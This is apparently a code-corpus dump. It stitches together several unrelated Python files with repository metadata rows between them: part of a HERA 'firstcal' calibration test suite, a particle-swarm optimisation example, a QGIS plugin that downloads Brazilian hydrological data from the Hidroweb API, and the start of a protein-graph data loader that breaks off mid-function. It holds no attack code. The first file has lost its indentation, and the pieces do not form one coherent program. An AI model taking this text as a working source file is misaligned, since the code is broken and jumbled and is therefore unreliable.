self.info = firstcal.FirstCalRedundantInfo(len(antpos))
self.info.init_from_reds(reds, antpos)
# Simulate unique "true" visibilities
np.random.seed(21)
self.vis_true = {'xx': {}}
i = 0
for rg in reds:
self.vis_true['xx'][rg[0]] = np.array(1.0 * np.random.randn(len(self.times), len(
self.freqs)) + 1.0j * np.random.randn(len(self.times), len(self.freqs)), dtype=np.complex64)
# Generate and apply firstcal gains
self.fcgains = {}
self.delays = {}
for i in ants:
if i == len(ants) - 1:
self.delays[i] = -1 * \
np.sum([delay for delay in self.delays.values()])
else:
self.delays[i] = np.random.randn() * 30
fcspectrum = np.exp(2.0j * np.pi * self.delays[i] * self.freqs)
self.fcgains[i] = np.array(
[fcspectrum for t in self.times], dtype=np.complex64)
self.delays[i] /= 1e9
# Generate fake data
bl2ublkey = {bl: rg[0] for rg in reds for bl in rg}
self.data = {}
self.wgts = {}
for rg in reds:
for (i, j) in rg:
self.data[(i.val, j.val)] = {}
self.wgts[(i.val, j.val)] = {}
for pol in ['xx']:
self.data[(i.val, j.val)][pol] = np.array(np.conj(self.fcgains[
i.val]) * self.fcgains[j.val] * self.vis_true['xx'][rg[0]], dtype=np.complex64)
self.wgts[(i.val, j.val)][pol] = np.ones_like(
self.data[(i.val, j.val)][pol], dtype=np.bool)
def test_data_to_delays(self):
fcal = firstcal.FirstCal(self.data, self.wgts, self.freqs, self.info)
w = fcal.data_to_delays()
for (i, k), (l, m) in w.keys():
nt.assert_almost_equal(w[(i, k), (l, m)][0], self.delays[
i] - self.delays[k] - self.delays[l] + self.delays[m], places=16)
def test_data_to_delays_average(self):
fcal = firstcal.FirstCal(self.data, self.wgts, self.freqs, self.info)
w = fcal.data_to_delays(average=True)
for (i, k), (l, m) in w.keys():
nt.assert_almost_equal(w[(i, k), (l, m)][0], self.delays[
i] - self.delays[k] - self.delays[l] + self.delays[m], places=16)
def test_get_N(self):
fcal = firstcal.FirstCal(self.data, self.wgts, self.freqs, self.info)
# the only requirement on N is it's shape.
nt.assert_equal(fcal.get_N(len(fcal.info.bl_pairs)).shape,
(len(fcal.info.bl_pairs), len(fcal.info.bl_pairs)))
def test_get_M(self):
fcal = firstcal.FirstCal(self.data, self.wgts, self.freqs, self.info)
nt.assert_equal(fcal.get_M().shape, (len(
self.info.bl_pairs), len(self.times)))
_M = np.array([1 * (self.delays[i] * np.ones(len(self.times)) - self.delays[k] * np.ones(len(self.times)) - self.delays[l]
* np.ones(len(self.times)) + self.delays[m] * np.ones(len(self.times))) for (i, k), (l, m) in self.info.bl_pairs])
nt.assert_equal(np.testing.assert_almost_equal(
_M, fcal.get_M(), decimal=16), None)
def test_run(self):
fcal = firstcal.FirstCal(self.data, self.wgts, self.freqs, self.info)
sols = fcal.run()
solved_delays = []
for pair in fcal.info.bl_pairs:
ant_indexes = fcal.info.blpair2antind(pair)
dlys = fcal.xhat[ant_indexes]
solved_delays.append(dlys[0] - dlys[1] - dlys[2] + dlys[3])
solved_delays = np.array(solved_delays).flatten()
nt.assert_equal(np.testing.assert_almost_equal(
fcal.M.flatten(), solved_delays, decimal=16), None)
def test_run_average(self):
fcal = firstcal.FirstCal(self.data, self.wgts, self.freqs, self.info)
sols = fcal.run(average=True)
solved_delays = []
for pair in fcal.info.bl_pairs:
ant_indexes = fcal.info.blpair2antind(pair)
dlys = fcal.xhat[ant_indexes]
solved_delays.append(dlys[0] - dlys[1] - dlys[2] + dlys[3])
solved_delays = np.array(solved_delays).flatten()
nt.assert_equal(np.testing.assert_almost_equal(
fcal.M.flatten(), solved_delays, decimal=16), None)
def test_process_ubls(self):
ubls = ''
ubaselines = firstcal.process_ubls(ubls)
nt.assert_equal(ubaselines, [])
ubls = '0_1,1_2,2_3'
ubaselines = firstcal.process_ubls(ubls)
nt.assert_equal(ubaselines, [(0, 1), (1, 2), (2, 3)])
ubls = '0_1,1,2'
nt.assert_raises(AssertionError, firstcal.process_ubls, ubls)
return
class TestFCRedInfo(object):
def test_init_from_reds(self):
antpos = np.array([[0., 0, 0], [1, 0, 0], [2, 0, 0], [3, 0, 0]])
reds = compute_reds(4, 'x', antpos)
blpairs = [((0, 1), (1, 2)), ((0, 1), (2, 3)),
((1, 2), (2, 3)), ((0, 2), (1, 3))]
A = np.array([[1, -2, 1, 0], [1, -1, -1, 1],
[0, 1, -2, 1], [1, -1, -1, 1]])
i = firstcal.FirstCalRedundantInfo(4)
i.init_from_reds(reds, antpos)
nt.assert_true(np.all(i.subsetant == np.arange(4, dtype=np.int32)))
nt.assert_equal(i.reds, reds)
nt.assert_equal(i.bl_pairs, blpairs)
nt.assert_true(i.blperant[0] == 2)
nt.assert_true(i.blperant[1] == 3)
nt.assert_true(i.blperant[2] == 3)
nt.assert_true(i.blperant[3] == 2)
nt.assert_true(np.all(i.A == A))
def test_bl_index(self):
antpos = np.array([[0., 0, 0], [1, 0, 0], [2, 0, 0], [3, 0, 0]])
reds = compute_reds(4, 'x', antpos)
i = firstcal.FirstCalRedundantInfo(4)
i.init_from_reds(reds, antpos)
bls_order = [bl for ublgp in reds for bl in ublgp]
for k, b in enumerate(bls_order):
nt.assert_equal(i.bl_index(b), k)
def test_blpair_index(self):
antpos = np.array([[0., 0, 0], [1, 0, 0], [2, 0, 0], [3, 0, 0]])
reds = compute_reds(4, 'x', antpos)
blpairs = [((0, 1), (1, 2)), ((0, 1), (2, 3)),
((1, 2), (2, 3)), ((0, 2), (1, 3))]
i = firstcal.FirstCalRedundantInfo(4)
i.init_from_reds(reds, antpos)
for k, bp in enumerate(blpairs):
nt.assert_equal(i.blpair_index(bp), k)
def test_blpair2antindex(self):
antpos = np.array([[0., 0, 0], [1, 0, 0], [2, 0, 0], [3, 0, 0]])
reds = compute_reds(4, 'x', antpos)
blpairs = [((0, 1), (1, 2)), ((0, 1), (2, 3)),
((1, 2), (2, 3)), ((0, 2), (1, 3))]
i = firstcal.FirstCalRedundantInfo(4)
i.init_from_reds(reds, antpos)
for bp in blpairs:
nt.assert_true(np.all(i.blpair2antind(bp) == map(
i.ant_index, np.array(bp).flatten())))
class Test_firstcal_run(object):
global calfile
global xx_vis
calfile = "hera_test_calfile"
xx_vis = "zen.2457698.40355.xx.HH.uvcAA"
# add directory with calfile
if CAL_PATH not in sys.path:
sys.path.append(CAL_PATH)
def test_empty_fileset(self):
o = firstcal.firstcal_option_parser()
cmd = "-C {0} -p xx".format(calfile)
opts, files = o.parse_args(cmd.split())
history = 'history'
nt.assert_raises(AssertionError, firstcal.firstcal_run,
files, opts, history)
return
def test_single_file_execution(self):
objective_file = os.path.join(
DATA_PATH, 'zen.2457698.40355.xx.HH.uvcAA.first.calfits')
xx_vis4real = os.path.join(DATA_PATH, xx_vis)
if os.path.exists(objective_file):
os.remove(objective_file)
o = firstcal.firstcal_option_parser()
cmd = "-C {0} -p xx --ex_ants=81 {1}".format(calfile, xx_vis4real)
opts, files = o.parse_args(cmd.split())
history = 'history'
firstcal.firstcal_run(files, opts, history)
nt.assert_true(os.path.exists(objective_file))
os.remove(objective_file)
return
def test_single_file_execution_nocalfile(self):
objective_file = os.path.join(
DATA_PATH, 'zen.2457999.76839.xx.HH.uvA.first.calfits')
xx_vis = os.path.join(DATA_PATH, 'zen.2457999.76839.xx.HH.uvA')
if os.path.exists(objective_file):
os.remove(objective_file)
o = firstcal.firstcal_option_parser()
cmd = "-p xx {0}".format(xx_vis)
opts, files = o.parse_args(cmd.split())
history = 'history'
firstcal.firstcal_run(files, opts, history)
nt.assert_true(os.path.exists(objective_file))
os.remove(objective_file)
return
def test_overwrite(self):
objective_file = os.path.join(
DATA_PATH, 'zen.2457698.40355.xx.HH.uvcAA.first.calfits')
xx_vis4real = os.path.join(DATA_PATH, xx_vis)
if os.path.exists(objective_file):
os.remove(objective_file)
_ = open(objective_file, 'a').close()
o = firstcal.firstcal_option_parser()
cmd = "-C {0} -p xx --overwrite {1}".format(calfile, xx_vis4real)
opts, files = o.parse_args(cmd.split())
history = 'history'
firstcal.firstcal_run(files, opts, history)
# check its a calfits file
uvc = UVCal()
uvc.read_calfits(objective_file)
# check a metadata column for accuracy
nt.assert_equal(uvc.Nants_data, 19)
# remove file
os.remove(objective_file)
return
def test_rotated_antennas(self):
objective_file = os.path.join(
DATA_PATH, 'zen.2457555.42443.xx.HH.uvcA.first.calfits')
xx_vis = os.path.join(
DATA_PATH, 'zen.2457555.42443.xx.HH.uvcA')
o = firstcal.firstcal_option_parser()
cmd = "-p xx -C {0} --ex_ants=22,81 {1}".format(calfile, xx_vis)
opts, files = o.parse_args(cmd.split())
history = 'history'
firstcal.firstcal_run(files, opts, history)
nt.assert_true(os.path.exists(objective_file))
os.remove(objective_file)
return
| 43.021807 | 142 | 0.506445 | 1,932 | 13,810 | 3.511387 | 0.127847 | 0.03066 | 0.022995 | 0.016509 | 0.652565 | 0.592718 | 0.533461 | 0.512087 | 0.489829 | 0.451356 | 0 | 0.1113 | 0.316872 | 13,810 | 320 | 143 | 43.15625 | 0.607802 | 0.024475 | 0 | 0.365942 | 0 | 0 | 0.033219 | 0.018802 | 0 | 0 | 0 | 0 | 0.094203 | 1 | 0.061594 | false | 0 | 0.043478 | 0 | 0.144928 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a85d6d53dc93cd8aac172a3ae52618d490931487 | 1,123 | py | Python | src/Examples/PSO2006Example.py | PatrikValkovic/MasterThesis | 6e9f3b186541db6c8395ebc96ace7289d01c805b | [
"MIT"
] | null | null | null | src/Examples/PSO2006Example.py | PatrikValkovic/MasterThesis | 6e9f3b186541db6c8395ebc96ace7289d01c805b | [
"MIT"
] | null | null | null | src/Examples/PSO2006Example.py | PatrikValkovic/MasterThesis | 6e9f3b186541db6c8395ebc96ace7289d01c805b | [
"MIT"
] | null | null | null | ###############################
#
# Created by Patrik Valkovic
# 5/7/2021
#
###############################
import numpy as np
import ffeat.pso as pso
import ffeat.measure as measure
import bbobtorch
DIM = 40
problem = bbobtorch.create_f07(DIM)
best_fitness = []
mean_fitness = []
alg = pso.PSO(
pso.initialization.Uniform(100, -5, 5, DIM), # position initialization
pso.initialization.Uniform(100, -1, 1, DIM), # velocity initialization
pso.evaluation.Evaluation(problem),
pso.neighborhood.Random(3), # use Random neighborhood
pso.update.PSO2006(), # use PSO2006 algorithm
measurements_termination=[
measure.FitnessLowest(measure.reporting.Array(best_fitness)),
measure.FitnessMean(measure.reporting.Array(mean_fitness)),
],
clip_position=pso.clip.Position(-5,5),
iterations=100,
)
alg()
import matplotlib.pyplot as plt
plt.figure()
plt.plot(range(len(best_fitness)), np.array(best_fitness) - float(problem.f_opt), label='Best fitness')
plt.plot(range(len(mean_fitness)), np.array(mean_fitness) - float(problem.f_opt), label='Mean fitness')
plt.legend()
plt.show()
| 28.075 | 103 | 0.687444 | 143 | 1,123 | 5.307692 | 0.412587 | 0.072464 | 0.063241 | 0.071146 | 0.073781 | 0.073781 | 0 | 0 | 0 | 0 | 0 | 0.034908 | 0.13268 | 1,123 | 39 | 104 | 28.794872 | 0.744353 | 0.114871 | 0 | 0 | 0 | 0 | 0.026002 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.178571 | 0 | 0.178571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a85efd598232cd71c89a7195d242dd7d67cb6a3c | 20,343 | py | Python | hidroweb_downloader.py | alexnaoki/hidroweb-downloader-plugin | 6609ba025bef6c088a072c20f026d0610769c677 | [
"MIT"
] | 1 | 2021-03-28T01:55:06.000Z | 2021-03-28T01:55:06.000Z | hidroweb_downloader.py | alexnaoki/hidroweb-downloader-plugin | 6609ba025bef6c088a072c20f026d0610769c677 | [
"MIT"
] | null | null | null | hidroweb_downloader.py | alexnaoki/hidroweb-downloader-plugin | 6609ba025bef6c088a072c20f026d0610769c677 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
/***************************************************************************
HidrowebDownloader
A QGIS plugin
Download hydrological data from ANA's API (Hidroweb)
Generated by Plugin Builder: http://g-sherman.github.io/Qgis-Plugin-Builder/
-------------------
begin : 2021-03-27
git sha : $Format:%H$
copyright : (C) 2021 by Alex Naoki Asato Kobayashi
email : alexkobayashi10@gmail.com
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
from qgis.PyQt.QtCore import QSettings, QTranslator, QCoreApplication, QVariant
from qgis.PyQt.QtGui import QIcon
from qgis.PyQt.QtWidgets import QAction
from qgis.core import *
# Initialize Qt resources from file resources.py
from .resources import *
# Import the code for the dialog
from .hidroweb_downloader_dialog import HidrowebDownloaderDialog
import os.path
from shapely.geometry import Point, Polygon, MultiPolygon
import requests, csv, os, datetime, calendar
import xml.etree.ElementTree as ET
class HidrowebDownloader:
"""QGIS Plugin Implementation."""
def __init__(self, iface):
"""Constructor.
:param iface: An interface instance that will be passed to this class
which provides the hook by which you can manipulate the QGIS
application at run time.
:type iface: QgsInterface
"""
# Save reference to the QGIS interface
self.iface = iface
# initialize plugin directory
self.plugin_dir = os.path.dirname(__file__)
# initialize locale
locale = QSettings().value('locale/userLocale')[0:2]
locale_path = os.path.join(
self.plugin_dir,
'i18n',
'HidrowebDownloader_{}.qm'.format(locale))
if os.path.exists(locale_path):
self.translator = QTranslator()
self.translator.load(locale_path)
QCoreApplication.installTranslator(self.translator)
# Declare instance attributes
self.actions = []
self.menu = self.tr(u'&Hidroweb Downloader')
# Check if plugin was started the first time in current QGIS session
# Must be set in initGui() to survive plugin reloads
self.first_start = None
# noinspection PyMethodMayBeStatic
def tr(self, message):
"""Get the translation for a string using Qt translation API.
We implement this ourselves since we do not inherit QObject.
:param message: String for translation.
:type message: str, QString
:returns: Translated version of message.
:rtype: QString
"""
# noinspection PyTypeChecker,PyArgumentList,PyCallByClass
return QCoreApplication.translate('HidrowebDownloader', message)
def add_action(
self,
icon_path,
text,
callback,
enabled_flag=True,
add_to_menu=True,
add_to_toolbar=True,
status_tip=None,
whats_this=None,
parent=None):
"""Add a toolbar icon to the toolbar.
:param icon_path: Path to the icon for this action. Can be a resource
path (e.g. ':/plugins/foo/bar.png') or a normal file system path.
:type icon_path: str
:param text: Text that should be shown in menu items for this action.
:type text: str
:param callback: Function to be called when the action is triggered.
:type callback: function
:param enabled_flag: A flag indicating if the action should be enabled
by default. Defaults to True.
:type enabled_flag: bool
:param add_to_menu: Flag indicating whether the action should also
be added to the menu. Defaults to True.
:type add_to_menu: bool
:param add_to_toolbar: Flag indicating whether the action should also
be added to the toolbar. Defaults to True.
:type add_to_toolbar: bool
:param status_tip: Optional text to show in a popup when mouse pointer
hovers over the action.
:type status_tip: str
:param parent: Parent widget for the new action. Defaults None.
:type parent: QWidget
:param whats_this: Optional text to show in the status bar when the
mouse pointer hovers over the action.
:returns: The action that was created. Note that the action is also
added to self.actions list.
:rtype: QAction
"""
icon = QIcon(icon_path)
action = QAction(icon, text, parent)
action.triggered.connect(callback)
action.setEnabled(enabled_flag)
if status_tip is not None:
action.setStatusTip(status_tip)
if whats_this is not None:
action.setWhatsThis(whats_this)
if add_to_toolbar:
# Adds plugin icon to Plugins toolbar
self.iface.addToolBarIcon(action)
if add_to_menu:
self.iface.addPluginToMenu(
self.menu,
action)
self.actions.append(action)
return action
def initGui(self):
"""Create the menu entries and toolbar icons inside the QGIS GUI."""
icon_path = ':/plugins/hidroweb_downloader/icon.png'
self.add_action(
icon_path,
text=self.tr(u'Download hydrological data from Hidroweb'),
callback=self.run,
parent=self.iface.mainWindow())
# will be set False in run()
self.first_start = True
def unload(self):
"""Removes the plugin menu item and icon from QGIS GUI."""
for action in self.actions:
self.iface.removePluginMenu(
self.tr(u'&Hidroweb Downloader'),
action)
self.iface.removeToolBarIcon(action)
def run(self):
"""Run method that performs all the real work"""
# Create the dialog with elements (after translation) and keep reference
# Only create GUI ONCE in callback, so that it will only load when the plugin is started
if self.first_start == True:
self.first_start = False
self.dlg = HidrowebDownloaderDialog()
self.dlg.download_button.clicked.connect(self.polygon_station)
self.dlg.inventarioDownload_button.clicked.connect(self.inventario)
# show the dialog
self.dlg.show()
# Run the dialog event loop
result = self.dlg.exec_()
# See if OK was pressed
if result:
# Do something useful here - delete the line containing pass and
# substitute with your code.
# print('ok')
print(self.dlg.file_widget.filePath())
def polygon_station(self):
error = self.check_errors()
if error:
print('Error')
# sys.exit()
else:
layer_input = self.dlg.mapLayer_box.currentLayer()
print(layer_input)
feat = layer_input.getFeatures()
for l in feat:
feat_geometry = l.geometry()
if self.dlg.buffer_spinbox.value() == 0:
pass
else:
feat_geometry = self.create_buffer_polygon(feat_geometry=feat_geometry, distance=self.dlg.buffer_spinbox.value(), segments=5)
with open(self.dlg.inventario_path.filePath(), encoding='utf8') as csvfile:
total = len(list(csv.DictReader(csvfile)))
print(total)
with open(self.dlg.inventario_path.filePath(), encoding='utf8') as csvfile:
data = csv.DictReader(csvfile)
i = 0
for row in data:
i += 1
# print(row)
self.dlg.progressBar.setValue(i/float(total)*100)
if feat_geometry.contains(QgsPointXY(float(row['Longitude']), float(row['Latitude']))):
print('aqui')
print(row['TipoEstacao'])
if (self.dlg.rain_checkbox.isChecked()) and (not self.dlg.flow_checkbox.isChecked()) and (int(row['TipoEstacao'])==2):
print('rain checkbox')
self.point_station(codigo=row['Codigo'],
tipoEstacao=row['TipoEstacao'],
lon=row['Longitude'],
lat=row['Latitude'])
elif (self.dlg.flow_checkbox.isChecked()) and (not self.dlg.rain_checkbox.isChecked()) and (int(row['TipoEstacao'])==1):
print('flow checkbox')
print(row['Codigo'])
self.point_station(codigo=row['Codigo'],
tipoEstacao=row['TipoEstacao'],
lon=row['Longitude'],
lat=row['Latitude'])
elif (self.dlg.rain_checkbox.isChecked()) and (self.dlg.flow_checkbox.isChecked()):
print('both rain and flow checkbox')
self.point_station(codigo=row['Codigo'],
tipoEstacao=row['TipoEstacao'],
lon=row['Longitude'],
lat=row['Latitude'])
else:
print('Nada selecionado')
# print(self.dlg.inventario_path.filePath()[:-3])
self.iface.messageBar().pushMessage('Success', 'Programa finalizado!', level=Qgis.Success)
def point_station(self, codigo, tipoEstacao, lon, lat):
layers = list(QgsProject.instance().mapLayers().values())
layers_name = [l.name() for l in layers]
s = self.download_station(code=codigo,
typeData=tipoEstacao,
folder_toDownload=f'{self.dlg.data_folder.filePath()}',
lon=lon, lat=lat)
if (not f'{codigo}_{tipoEstacao}' in layers_name) and (s[0]):
lyr = QgsVectorLayer("point?crs=epsg:4326&field=id:integer", f"{codigo}_{tipoEstacao}", "memory")
QgsProject.instance().addMapLayer(lyr)
target_layer = QgsProject.instance().mapLayersByName(f'{codigo}_{tipoEstacao}')
target_layer[0].startEditing()
l_d = target_layer[0].dataProvider()
feat = QgsFeature(target_layer[0].fields())
feat.setGeometry(QgsPoint(float(lon), float(lat)))
if int(tipoEstacao)== 1:
l_d.addAttributes([QgsField('Date', QVariant.Date), QgsField('Consistencia', QVariant.Int), QgsField('Vazao',QVariant.Double)])
for i, (date, consis, data) in enumerate(zip(s[1], s[2], s[3])):
feat.setAttributes([i, date.strftime('%Y-%m-%d'),consis,data])
l_d.addFeatures([feat])
elif int(tipoEstacao) == 2:
l_d.addAttributes([QgsField('Date', QVariant.Date), QgsField('Consistencia', QVariant.Int), QgsField('Chuva',QVariant.Double)])
for i, (date, consis, data) in enumerate(zip(s[1], s[2], s[3])):
feat.setAttributes([i, date.strftime('%Y-%m-%d'),consis,data])
l_d.addFeatures([feat])
target_layer[0].updateExtents()
target_layer[0].commitChanges()
else:
pass
def download_station(self, code, typeData, folder_toDownload, lon, lat):
if int(typeData) == 1:
typeData = '3'
else:
pass
params = {'codEstacao': f'{int(code):08}', 'dataInicio': '', 'dataFim': '', 'tipoDados': '{}'.format(typeData), 'nivelConsistencia': ''}
response = requests.get(r'http://telemetriaws1.ana.gov.br/ServiceANA.asmx/HidroSerieHistorica', params)
# response = requests.get(r'http://telemetriaws1.ana.gov.br/ServiceANA.asmx?op=HidroSerieHistorica', params)
# print(code,response.status_code)
tree = ET.ElementTree(ET.fromstring(response.content))
root = tree.getroot()
list_data = []
list_consistenciaF = []
list_month_dates = []
lon = float(lon)
lat = float(lat)
for i in root.iter('SerieHistorica'):
codigo = i.find("EstacaoCodigo").text
consistencia = i.find("NivelConsistencia").text
date = i.find("DataHora").text
date = datetime.datetime.strptime(date, '%Y-%m-%d %H:%M:%S')
last_day = calendar.monthrange(date.year, date.month)[1]
month_dates = [date + datetime.timedelta(days=i) for i in range(last_day)]
data = []
list_consistencia = []
for day in range(last_day):
if params['tipoDados'] == '3':
value = 'Vazao{:02}'.format(day+1)
try:
data.append(float(i.find(value).text))
list_consistencia.append(int(consistencia))
except TypeError:
data.append(i.find(value).text)
list_consistencia.append(int(consistencia))
except AttributeError:
data.append(None)
list_consistencia.append(int(consistencia))
if params['tipoDados'] == '2':
value = 'Chuva{:02}'.format(day+1)
try:
data.append(float(i.find(value).text))
list_consistencia.append(consistencia)
except TypeError:
data.append(i.find(value).text)
list_consistencia.append(consistencia)
except AttributeError:
data.append(None)
list_consistencia.append(consistencia)
list_data = list_data + data
list_consistenciaF = list_consistenciaF + list_consistencia
list_month_dates = list_month_dates + month_dates
if len(list_data) > 0:
rows = zip(list_month_dates,[lon for l in range(len(list_month_dates))],[lat for l in range(len(list_month_dates))], list_consistenciaF, list_data)
with open(os.path.join(folder_toDownload, f'{codigo}_{typeData}.csv'), 'w', newline='') as f:
writer = csv.writer(f)
writer.writerow(('Date','Longitude','Latitude', f'Consistencia_{codigo}_{typeData}', f'Data_{codigo}_{typeData}'))
for row in rows:
writer.writerow(row)
print('CSV gerado')
return (True, list_month_dates, list_consistenciaF, list_data)
else:
print('Dado insuficiente')
return (False, list_month_dates, list_consistenciaF, list_data)
def create_buffer_polygon(self, feat_geometry, distance, segments):
layers = list(QgsProject.instance().mapLayers().values())
layers_name = [l.name() for l in layers]
if not 'buffer_polygon' in layers_name:
lyr = QgsVectorLayer("polygon?crs=epsg:4326&field=id:integer", f"buffer_polygon", "memory")
QgsProject.instance().addMapLayer(lyr)
target_layer = QgsProject.instance().mapLayersByName('buffer_polygon')
target_layer[0].startEditing()
l_d = target_layer[0].dataProvider()
# feats = target_layer[0].getFeatures()
# for feat in feats:
# geom = feat.geometry()
feat = QgsFeature(target_layer[0].fields())
feat.setGeometry(feat_geometry.buffer(distance, segments))
l_d.addFeature(feat)
target_layer[0].updateExtents()
target_layer[0].commitChanges()
f = target_layer[0].getFeatures()
for l in f:
l_geometry = l.geometry()
return l_geometry
def inventario(self):
api_inventario = 'http://telemetriaws1.ana.gov.br/ServiceANA.asmx/HidroInventario'
params = {'codEstDE':'','codEstATE':'','tpEst':'','nmEst':'','nmRio':'','codSubBacia':'',
'codBacia':'','nmMunicipio':'','nmEstado':'','sgResp':'','sgOper':'','telemetrica':''}
self.dlg.progressBar_inventario.setValue(2)
response = requests.get(api_inventario, params)
self.dlg.progressBar_inventario.setValue(10)
tree = ET.ElementTree(ET.fromstring(response.content))
root = tree.getroot()
self.dlg.progressBar_inventario.setValue(15)
if os.path.isfile(os.path.join(self.dlg.file_widget.filePath(), f'inventario.csv')):
print('Arquivo inventario já existe')
self.dlg.progressBar_inventario.setValue(100)
else:
with open(os.path.join(self.dlg.file_widget.filePath(), f'inventario.csv'), 'w',newline='') as f:
writer = csv.writer(f)
writer.writerow(('Codigo', 'Latitude','Longitude','TipoEstacao'))
self.dlg.progressBar_inventario.setValue(20)
# print(len(root.findall('Codigo')))
total = len(list(root.iter('Table')))
j = 0
self.dlg.progressBar_inventario.setValue(25)
for i in root.iter('Table'):
print(i.find('Codigo').text, i.find('Latitude').text, i.find('Longitude').text, i.find('TipoEstacao').text)
writer.writerow((i.find('Codigo').text, i.find('Latitude').text, i.find('Longitude').text, i.find('TipoEstacao').text))
j+=1
# self.dlg.progressBar_inventario.setValue(j/float(total)*100)
self.dlg.progressBar_inventario.setValue(100)
print('Arquivo inventario.csv criado')
self.dlg.inventario_path.setFilePath(os.path.join(self.dlg.file_widget.filePath(), 'inventario.csv'))
self.iface.messageBar().pushMessage('Success', 'Download do inventario.csv concluído!', level=Qgis.Success)
def check_errors(self):
error = False
print(self.dlg.inventario_path.filePath()[-4:])
if (self.dlg.inventario_path.filePath() == None) or (self.dlg.inventario_path.filePath()=='') or (not self.dlg.inventario_path.filePath()[-4:]=='.csv'):
print(self.dlg.inventario_path.filePath())
self.iface.messageBar().pushMessage("Error", "inventario.csv não encontrado", level=Qgis.Critical, duration=5)
error = True
if self.dlg.mapLayer_box.currentLayer() == None:
self.iface.messageBar().pushMessage("Error", "Shapefile (Polígono) não encontrado", level=Qgis.Critical, duration=5)
error = True
if (not self.dlg.mapLayer_box.currentLayer().crs().authid()=='EPSG:4674') and (not self.dlg.mapLayer_box.currentLayer().crs().authid()=='EPSG:4326'):
print()
self.iface.messageBar().pushMessage("Error", "Shapefile (Polígono) com Sistema de Coordenadas incorreto. O correto é Sirgas2000 ou WGS84.", level=Qgis.Critical, duration=5)
error = True
if (self.dlg.data_folder.filePath() == None) or (self.dlg.data_folder.filePath() == ''):
self.iface.messageBar().pushMessage("Error", "Nenhuma pasta selecionada para o download", level=Qgis.Critical, duration=5)
error = True
return error
| 44.127983 | 184 | 0.563683 | 2,168 | 20,343 | 5.193727 | 0.232472 | 0.02611 | 0.012789 | 0.016785 | 0.400178 | 0.330284 | 0.278952 | 0.249378 | 0.232948 | 0.205062 | 0 | 0.00844 | 0.312737 | 20,343 | 460 | 185 | 44.223913 | 0.796939 | 0.211178 | 0 | 0.283688 | 0 | 0 | 0.112402 | 0.020042 | 0 | 0 | 0 | 0 | 0 | 1 | 0.042553 | false | 0.010638 | 0.035461 | 0 | 0.102837 | 0.067376 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a85f53c1b7be763529623bee7f828aec71c096d6 | 8,700 | py | Python | bio/loader.py | selincetin/pretrain-gnns | 8ac7768f77bd74351c5f489a64b4390fdadfc4f9 | [
"MIT"
] | 590 | 2020-02-09T21:43:11.000Z | 2022-03-26T05:57:18.000Z | bio/loader.py | SuperXiang/pretrain-gnns | 7bb81b5cc2d37241ee72cbfa40fbd89b0cc2394f | [
"MIT"
] | 48 | 2020-02-22T21:33:45.000Z | 2022-03-06T18:53:43.000Z | bio/loader.py | SuperXiang/pretrain-gnns | 7bb81b5cc2d37241ee72cbfa40fbd89b0cc2394f | [
"MIT"
] | 133 | 2020-02-02T07:21:09.000Z | 2022-03-24T06:07:14.000Z | import os
import torch
import random
import networkx as nx
import pandas as pd
import numpy as np
from torch.utils import data
from torch_geometric.data import Data
from torch_geometric.data import InMemoryDataset
from torch_geometric.data import Batch
from itertools import repeat, product, chain
from collections import Counter, deque
from networkx.algorithms.traversal.breadth_first_search import generic_bfs_edges
def nx_to_graph_data_obj(g, center_id, allowable_features_downstream=None,
allowable_features_pretrain=None,
node_id_to_go_labels=None):
"""
Converts nx graph of PPI to pytorch geometric Data object.
:param g: nx graph object of ego graph
:param center_id: node id of center node in the ego graph
:param allowable_features_downstream: list of possible go function node
features for the downstream task. The resulting go_target_downstream node
feature vector will be in this order.
:param allowable_features_pretrain: list of possible go function node
features for the pretraining task. The resulting go_target_pretrain node
feature vector will be in this order.
:param node_id_to_go_labels: dict that maps node id to a list of its
corresponding go labels
:return: pytorch geometric Data object with the following attributes:
edge_attr
edge_index
x
species_id
center_node_idx
go_target_downstream (only if node_id_to_go_labels is not None)
go_target_pretrain (only if node_id_to_go_labels is not None)
"""
n_nodes = g.number_of_nodes()
n_edges = g.number_of_edges()
# nodes
nx_node_ids = [n_i for n_i in g.nodes()] # contains list of nx node ids
# in a particular ordering. Will be used as a mapping to convert
# between nx node ids and data obj node indices
x = torch.tensor(np.ones(n_nodes).reshape(-1, 1), dtype=torch.float)
# we don't have any node labels, so set to dummy 1. dim n_nodes x 1
center_node_idx = nx_node_ids.index(center_id)
center_node_idx = torch.tensor([center_node_idx], dtype=torch.long)
# edges
edges_list = []
edge_features_list = []
for node_1, node_2, attr_dict in g.edges(data=True):
edge_feature = [attr_dict['w1'], attr_dict['w2'], attr_dict['w3'],
attr_dict['w4'], attr_dict['w5'], attr_dict['w6'],
attr_dict['w7'], 0, 0] # last 2 indicate self-loop
# and masking
edge_feature = np.array(edge_feature, dtype=int)
# convert nx node ids to data obj node index
i = nx_node_ids.index(node_1)
j = nx_node_ids.index(node_2)
edges_list.append((i, j))
edge_features_list.append(edge_feature)
edges_list.append((j, i))
edge_features_list.append(edge_feature)
# data.edge_index: Graph connectivity in COO format with shape [2, num_edges]
edge_index = torch.tensor(np.array(edges_list).T, dtype=torch.long)
# data.edge_attr: Edge feature matrix with shape [num_edges, num_edge_features]
edge_attr = torch.tensor(np.array(edge_features_list),
dtype=torch.float)
try:
